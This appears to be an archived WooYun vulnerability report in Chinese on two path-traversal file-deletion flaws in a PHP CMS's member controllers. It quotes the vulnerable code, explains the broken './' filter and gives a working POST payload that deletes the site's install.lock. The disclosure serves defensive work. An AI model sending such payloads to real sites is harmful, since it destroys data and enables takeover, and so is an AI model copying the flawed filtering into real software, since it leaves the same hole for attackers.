乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-11: 细节已通知厂商并且等待厂商处理中 2015-05-11: 厂商已经确认,细节仅向厂商公开 2015-05-14: 细节向第三方安全合作伙伴开放 2015-07-05: 细节向核心白帽子及相关领域专家公开 2015-07-15: 细节向普通白帽子公开 2015-07-25: 细节向实习白帽子公开 2015-08-09: 细节向公众公开
1.2.8
一处没有过滤,一处过滤失误第一处:/protected/apps/member/controller/inforController.php
public function index() { $auth=$this->auth; $id=$auth['id']; if(!$this->isPost()){ $info=model('members')->find("id='{$id}'"); $this->info=$info; $this->path=__ROOT__.'/upload/member/image/'; $this->twidth=config('HEAD_W'); $this->theight=config('HEAD_H'); $this->display(); }else{ if(!empty($_POST['email']) && !Check::email(trim($_POST['email']))) $this->error('邮箱格式错误~'); $data['nickname']=in(trim($_POST['nickname'])); $acc=model('members')->find("id!='{$id}' AND nickname='".$data['nickname']."'"); if(!empty($acc['nickname'])) $this->error('该昵称已经有人使用~'); if (empty($_FILES['headpic']['name']) === false){ $tfile=date("Ymd"); $imgupload= $this->upload($this->uploadpath.$tfile.'/',config('imgupSize'),'jpg,bmp,gif,png'); $imgupload->saveRule='thumb_'.time(); $imgupload->upload(); $fileinfo=$imgupload->getUploadFileInfo(); $errorinfo=$imgupload->getErrorMsg(); if(!empty($errorinfo)) $this->alert($errorinfo); else{ if(!empty($_POST['oldheadpic'])){ $picpath=$this->uploadpath.$_POST['oldheadpic']; if(file_exists($picpath)) @unlink($picpath); //修改个人资料时没有对$_POST['oldheadpic']参数进行过滤,可以传入../ } $data['headpic']=$tfile.'/'.$fileinfo[0]['savename']; } } $data['email']=in($_POST['email']); $data['tel']=in($_POST['tel']); $data['qq']=in($_POST['qq']); model('members')->update("id='{$id}'",$data); $info=model('members')->find("id='{$id}'"); if($info['headpic'] && !Check::url($info['headpic'])) $info['headpic']=__UPLOAD__.'/member/image/'.$info['headpic']; $cookie_auth = $info['id'].'\t'.$info['groupid'].'\t'.$info['account'].'\t'.$info['nickname'].'\t'.$info['lastip'].'\t'.$info['headpic']; set_cookie('auth',$cookie_auth,0); $this->success('信息编辑成功~'); } }
第二处:/protected/apps/member/controller/newsController.php 过滤失误
//封面图删除 public function delcover() { //文件保存目录 $id=in($_POST['id']); $pic=in($_POST['pic']); $pic=str_replace('./', '', $pic); //将./过滤为空,使用../..//将变成../ $data['picture']= $this->nopic; if(model('news')->update("id='$id' and account='".$this->mesprefix.$this->auth['account']."'",$data)){ $picpath=$this->uploadpath.$pic; echo $picpath; if(file_exists($picpath)) @unlink($picpath); echo 1; }else echo '删除封面失败~'; }
POC1:
POC2:http://localhost/index.php?r=member/news/delcoverPOST:id=17&pic=../..//../..//../..//protected/apps/install/install.lock
过滤一下,其他地方截取后3位的检测方法不太好
危害等级:中
漏洞Rank:5
确认时间:2015-05-11 10:53
谢谢关注
暂无